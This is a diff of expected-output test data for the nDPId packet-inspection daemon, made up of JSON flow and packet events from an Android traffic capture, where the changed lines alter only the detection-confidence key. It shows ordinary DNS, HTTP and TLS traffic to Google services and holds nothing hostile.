00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1582454871823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871823,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrCJAAEARCSjAqAIQwKgCASm1ADUALW7k1fkBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1582454871824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871824,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRS4IAAEARqbjAqAIBwKgCEAA1KbUAPSLB1fmBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} 
-00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871824,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871824,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1582454871827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871827,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8rCNAAEARCSzAqAIQwKgCAYBAADUAKPh7cqMBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1582454871827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871827,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMd48AAEARfbDAqAIBwKgCEAA1gEAAOLeFcqOBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -287,98 +288,98 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"} 
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1582454871881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454871881,"pkt":"xiwDYGpkTGr2n\/YnCABFAABErDBAAEARCRfAqAIQwKgCAZtQADUAMNjjuKUBAAABAAAAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 